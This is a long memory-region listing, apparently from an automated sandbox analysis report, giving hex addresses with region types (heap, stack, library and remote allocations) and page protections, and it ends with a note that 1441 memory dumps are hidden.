||
A788000
|
heap
|
page read and write
|
||
48E3000
|
heap
|
page read and write
|
||
BB3E000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
8617000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
BB8F000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
BB1D000
|
heap
|
page read and write
|
||
B84D000
|
heap
|
page read and write
|
||
BA52000
|
heap
|
page read and write
|
||
87C0000
|
heap
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
896D000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
4906000
|
heap
|
page read and write
|
||
B66D000
|
heap
|
page read and write
|
||
284AAF13000
|
heap
|
page read and write
|
||
8916000
|
heap
|
page read and write
|
||
284ABE20000
|
trusted library allocation
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
284B04C5000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
BAFB000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
7DF4F0F31000
|
trusted library allocation
|
page execute read
|
||
A77E000
|
heap
|
page read and write
|
||
284AAF02000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
7DB0000
|
heap
|
page read and write
|
||
284B0513000
|
heap
|
page read and write
|
||
284B0502000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
284AB600000
|
heap
|
page read and write
|
||
284AAE7E000
|
heap
|
page read and write
|
||
4AC0000
|
trusted library allocation
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
BA31000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
BAEB000
|
heap
|
page read and write
|
||
8EA6000
|
heap
|
page read and write
|
||
ADD3000
|
heap
|
page read and write
|
||
B48B000
|
stack
|
page read and write
|
||
284B06C2000
|
trusted library allocation
|
page read and write
|
||
8617000
|
heap
|
page read and write
|
||
284B04F2000
|
heap
|
page read and write
|
||
BA1B000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
E21A000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
BB0F000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
ADE3000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
A669000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
A653000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
BAF0000
|
heap
|
page read and write
|
||
C15D000
|
stack
|
page read and write
|
||
A65F000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
284B0340000
|
trusted library allocation
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
87F7000
|
heap
|
page read and write
|
||
BA3E000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
BC43000
|
heap
|
page read and write
|
||
DD93000
|
trusted library allocation
|
page read and write
|
||
B849000
|
heap
|
page read and write
|
||
B98E000
|
heap
|
page read and write
|
||
E1D3000
|
trusted library allocation
|
page read and write
|
||
BACB000
|
heap
|
page read and write
|
||
D7BD000
|
stack
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
B8D2000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
4898000
|
heap
|
page read and write
|
||
ADDA000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
284B0450000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
284AAE59000
|
heap
|
page read and write
|
||
B68F000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
B9B2000
|
heap
|
page read and write
|
||
85E7000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
BA4C000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
ADFB000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
C2DB000
|
stack
|
page read and write
|
||
7DF4F0F31000
|
trusted library allocation
|
page execute read
|
||
87FD000
|
heap
|
page read and write
|
||
BA5E000
|
heap
|
page read and write
|
||
284B042C000
|
heap
|
page read and write
|
||
B8DC000
|
heap
|
page read and write
|
||
A659000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
8EA6000
|
heap
|
page read and write
|
||
A23D000
|
stack
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
A65B000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
8019000
|
stack
|
page read and write
|
||
85E6000
|
heap
|
page read and write
|
||
A5DE000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
4B54000
|
heap
|
page read and write
|
||
BB14000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
A641000
|
heap
|
page read and write
|
||
284AC2A1000
|
trusted library allocation
|
page read and write
|
||
1380000
|
remote allocation
|
page read and write
|
||
11F9000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
BB66000
|
heap
|
page read and write
|
||
BBEC000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
284AAF17000
|
heap
|
page read and write
|
||
48D4000
|
heap
|
page read and write
|
||
BAF0000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
284AAF00000
|
heap
|
page read and write
|
||
A66F000
|
heap
|
page read and write
|
||
BA67000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
8602000
|
heap
|
page read and write
|
||
BA1F000
|
heap
|
page read and write
|
||
4B4C000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
E1E0000
|
trusted library allocation
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
4AD0000
|
trusted library allocation
|
page read and write
|
||
B8CC000
|
heap
|
page read and write
|
||
FB0000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
4C34000
|
heap
|
page read and write
|
||
284B0700000
|
remote allocation
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
BB1D000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
1275000
|
heap
|
page read and write
|
||
4BE8000
|
heap
|
page read and write
|
||
B1CE000
|
stack
|
page read and write
|
||
B679000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
85FD000
|
heap
|
page read and write
|
||
284AAE79000
|
heap
|
page read and write
|
||
A787C77000
|
stack
|
page read and write
|
||
A600000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
BBF6000
|
heap
|
page read and write
|
||
2F36000
|
stack
|
page read and write
|
||
B789000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
284AAD80000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
C010000
|
heap
|
page readonly
|
||
497F000
|
heap
|
page read and write
|
||
A687000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
88FB000
|
heap
|
page read and write
|
||
47CA000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
B918000
|
heap
|
page read and write
|
||
284AAE43000
|
heap
|
page read and write
|
||
284B03F0000
|
trusted library allocation
|
page read and write
|
||
C070000
|
trusted library allocation
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
7C7E000
|
stack
|
page read and write
|
||
284B042A000
|
heap
|
page read and write
|
||
A77C000
|
heap
|
page read and write
|
||
284B06B0000
|
trusted library allocation
|
page read and write
|
||
B849000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
DB38000
|
stack
|
page read and write
|
||
BB42000
|
heap
|
page read and write
|
||
B8DC000
|
heap
|
page read and write
|
||
BB51000
|
heap
|
page read and write
|
||
BAFB000
|
heap
|
page read and write
|
||
BBC0000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
136C000
|
stack
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
B9FE000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
284AB71A000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
BAE9000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
88F3000
|
heap
|
page read and write
|
||
1170000
|
heap
|
page read and write
|
||
8727000
|
heap
|
page read and write
|
||
4BEE000
|
heap
|
page read and write
|
||
ADC1000
|
heap
|
page read and write
|
||
BB94000
|
heap
|
page read and write
|
||
BA4C000
|
heap
|
page read and write
|
||
284B02D0000
|
trusted library allocation
|
page read and write
|
||
87FB000
|
heap
|
page read and write
|
||
88C2000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
85E6000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
4B38000
|
heap
|
page read and write
|
||
B98B000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
C023000
|
trusted library allocation
|
page read and write
|
||
A62A000
|
heap
|
page read and write
|
||
284B044A000
|
heap
|
page read and write
|
||
BAF0000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
7DF4F0F31000
|
trusted library allocation
|
page execute read
|
||
8918000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
284B04EE000
|
heap
|
page read and write
|
||
BA21000
|
heap
|
page read and write
|
||
8850000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
B9A1000
|
heap
|
page read and write
|
||
86C8000
|
heap
|
page read and write
|
||
4C10000
|
heap
|
page read and write
|
||
A788A7C000
|
stack
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
B98E000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
4972000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
284B0370000
|
trusted library allocation
|
page read and write
|
||
284B0350000
|
trusted library allocation
|
page read and write
|
||
8617000
|
heap
|
page read and write
|
||
BBCF000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
BB47000
|
heap
|
page read and write
|
||
493B000
|
heap
|
page read and write
|
||
A787D7E000
|
unkown
|
page readonly
|
||
13B5000
|
heap
|
page read and write
|
||
A771000
|
heap
|
page read and write
|
||
126C000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
FB9000
|
heap
|
page read and write
|
||
87F5000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
A78857E000
|
unkown
|
page readonly
|
||
887E000
|
heap
|
page read and write
|
||
A655000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
861B000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
A65F000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
E0BB000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
47B3000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
8920000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
BB98000
|
heap
|
page read and write
|
||
BB33000
|
heap
|
page read and write
|
||
B907000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
47C1000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
B9FE000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
284AB713000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
ADBD000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
8973000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
85D2000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
284AAF06000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
BB88000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
284B04CD000
|
heap
|
page read and write
|
||
7AB7000
|
stack
|
page read and write
|
||
85E4000
|
heap
|
page read and write
|
||
4C57000
|
heap
|
page read and write
|
||
B980000
|
heap
|
page read and write
|
||
284AAE94000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
BB75000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
BB45000
|
heap
|
page read and write
|
||
887E000
|
heap
|
page read and write
|
||
B9B8000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
A7897FE000
|
stack
|
page read and write
|
||
284AADE0000
|
trusted library allocation
|
page read and write
|
||
88C0000
|
heap
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
898F000
|
heap
|
page read and write
|
||
85E6000
|
heap
|
page read and write
|
||
8798000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
8983000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
A765000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
284B0656000
|
trusted library allocation
|
page read and write
|
||
86AA000
|
heap
|
page read and write
|
||
BBAC000
|
heap
|
page read and write
|
||
ADC5000
|
heap
|
page read and write
|
||
7DF4F0F40000
|
trusted library allocation
|
page readonly
|
||
A76F000
|
heap
|
page read and write
|
||
284AAF02000
|
heap
|
page read and write
|
||
284B04AF000
|
heap
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
4906000
|
heap
|
page read and write
|
||
4948000
|
heap
|
page read and write
|
||
3340000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
4960000
|
heap
|
page read and write
|
||
BAF8000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
8942000
|
heap
|
page read and write
|
||
A7876BC000
|
stack
|
page read and write
|
||
C020000
|
trusted library allocation
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
8894000
|
heap
|
page read and write
|
||
4C03000
|
heap
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
BADA000
|
heap
|
page read and write
|
||
BB97000
|
heap
|
page read and write
|
||
47BD000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
BA9A000
|
heap
|
page read and write
|
||
A76F000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
8659000
|
heap
|
page read and write
|
||
8685000
|
heap
|
page read and write
|
||
E0B8000
|
heap
|
page read and write
|
||
284B0691000
|
trusted library allocation
|
page read and write
|
||
7DF4F0F61000
|
trusted library allocation
|
page execute read
|
||
BAE0000
|
heap
|
page read and write
|
||
1380000
|
remote allocation
|
page read and write
|
||
A650000
|
heap
|
page read and write
|
||
B959000
|
heap
|
page read and write
|
||
BC02000
|
heap
|
page read and write
|
||
87EE000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
A77E000
|
heap
|
page read and write
|
||
284AAE74000
|
heap
|
page read and write
|
||
4BA8000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
92E8000
|
stack
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
BA64000
|
heap
|
page read and write
|
||
B854000
|
heap
|
page read and write
|
||
BB42000
|
heap
|
page read and write
|
||
C000000
|
trusted library allocation
|
page read and write
|
||
AD96000
|
heap
|
page read and write
|
||
7DF4F0F20000
|
trusted library allocation
|
page readonly
|
||
4BA2000
|
heap
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
284AB700000
|
heap
|
page read and write
|
||
8934000
|
heap
|
page read and write
|
||
BB90000
|
heap
|
page read and write
|
||
284AAE13000
|
heap
|
page read and write
|
||
893E000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
49A5000
|
heap
|
page read and write
|
||
C88C000
|
stack
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
85C1000
|
heap
|
page read and write
|
||
ADF1000
|
heap
|
page read and write
|
||
A749000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
B991000
|
heap
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
BBCE000
|
heap
|
page read and write
|
||
103F000
|
heap
|
page read and write
|
||
BA1B000
|
heap
|
page read and write
|
||
A66F000
|
heap
|
page read and write
|
||
BBC0000
|
heap
|
page read and write
|
||
B951000
|
heap
|
page read and write
|
||
4960000
|
heap
|
page read and write
|
||
BB53000
|
heap
|
page read and write
|
||
86B8000
|
heap
|
page read and write
|
||
A68F000
|
heap
|
page read and write
|
||
E0B4000
|
heap
|
page read and write
|
||
BBEF000
|
heap
|
page read and write
|
||
284AB615000
|
heap
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
883C000
|
heap
|
page read and write
|
||
B840000
|
heap
|
page read and write
|
||
A6A2000
|
heap
|
page read and write
|
||
A7CE000
|
heap
|
page read and write
|
||
284B04C3000
|
heap
|
page read and write
|
||
BA30000
|
heap
|
page read and write
|
||
4935000
|
heap
|
page read and write
|
||
B884000
|
heap
|
page read and write
|
||
BB8B000
|
heap
|
page read and write
|
||
10D0000
|
heap
|
page read and write
|
||
8614000
|
heap
|
page read and write
|
||
496E000
|
heap
|
page read and write
|
||
DABD000
|
stack
|
page read and write
|
||
8804000
|
heap
|
page read and write
|
||
BB42000
|
heap
|
page read and write
|
||
284AAE2B000
|
heap
|
page read and write
|
||
E1D0000
|
trusted library allocation
|
page read and write
|
||
88D6000
|
heap
|
page read and write
|
||
7DF4F0F21000
|
trusted library allocation
|
page execute read
|
||
87F7000
|
heap
|
page read and write
|
||
BA23000
|
heap
|
page read and write
|
||
4B10000
|
heap
|
page read and write
|
||
8727000
|
heap
|
page read and write
|
||
894A000
|
heap
|
page read and write
|
||
DD80000
|
trusted library allocation
|
page read and write
|
||
87F3000
|
heap
|
page read and write
|
||
BB0D000
|
heap
|
page read and write
|
||
BAF8000
|
heap
|
page read and write
|
||
127A000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
A696000
|
heap
|
page read and write
|
||
C050000
|
heap
|
page read and write
|
||
2BDE000
|
stack
|
page read and write
|
||
284AC2D0000
|
trusted library allocation
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
87EB000
|
heap
|
page read and write
|
||
85E9000
|
heap
|
page read and write
|
||
B931000
|
heap
|
page read and write
|
||
86E7000
|
heap
|
page read and write
|
||
882B000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
A78987E000
|
unkown
|
page readonly
|
||
BB92000
|
heap
|
page read and write
|
||
8999000
|
heap
|
page read and write
|
||
880D000
|
heap
|
page read and write
|
||
A78807E000
|
stack
|
page readonly
|
||
4C2F000
|
heap
|
page read and write
|
||
A647000
|
heap
|
page read and write
|
||
87E0000
|
heap
|
page read and write
|
||
2A70000
|
heap
|
page read and write
|
||
B9DA000
|
heap
|
page read and write
|
||
284AB990000
|
trusted library allocation
|
page read and write
|
||
87F9000
|
heap
|
page read and write
|
||
BA27000
|
heap
|
page read and write
|
||
4CF7000
|
heap
|
page read and write
|
||
A704000
|
heap
|
page read and write
|
||
87FD000
|
heap
|
page read and write
|
||
896F000
|
heap
|
page read and write
|
||
A788000
|
heap
|
page read and write
|
||
ADDB000
|
heap
|
page read and write
|
||
8798000
|
heap
|
page read and write
|
||
85E0000
|
heap
|
page read and write
|
||
BB0B000
|
heap
|
page read and write
|
||
B692000
|
heap
|
page read and write
|
||
BA3E000
|
heap
|
page read and write
|
||
A63E000
|
heap
|
page read and write
|
||
A762000
|
heap
|
page read and write
|
||
8791000
|
heap
|
page read and write
|
||
87E8000
|
heap
|
page read and write
|
||
8789000
|
heap
|
page read and write
|
||
4B52000
|
heap
|
page read and write
|
||
8978000
|
heap
|
page read and write
|
||
284B04E3000
|
heap
|
page read and write
|
||
A6A6000
|
heap
|
page read and write
|
||
284B0672000
|
trusted library allocation
|
page read and write
|
||
A68B000
|
heap
|
page read and write
|
||
A660000
|
heap
|
page read and write
|
||
883D000
|
heap
|
page read and write
|
||
284B03D0000
|
trusted library allocation
|
page read and write
|
||
B530000
|
unkown
|
page readonly
|
||
48D9000
|
heap
|
page read and write
|
||
DD80000
|
trusted library allocation
|
page read and write
|
||
A5FB000
|
heap
|
page read and write
|
||
A78837E000
|
unkown
|
page readonly
|
||
5540000
|
trusted library section
|
page read and write
|
||
85C5000
|
heap
|
page read and write
|
||
BB5B000
|
heap
|
page read and write
|
||
BA4E000
|
heap
|
page read and write
|
||
BA23000
|
heap
|
page read and write
|
||
A665000
|
heap
|
page read and write
|
||
BBA7000
|
heap
|
page read and write
|
||
8944000
|
heap
|
page read and write
|
||
88F7000
|
heap
|
page read and write
|
||
4B3B000
|
heap
|
page read and write
|
There are 1441 hidden memdumps, click here to show them.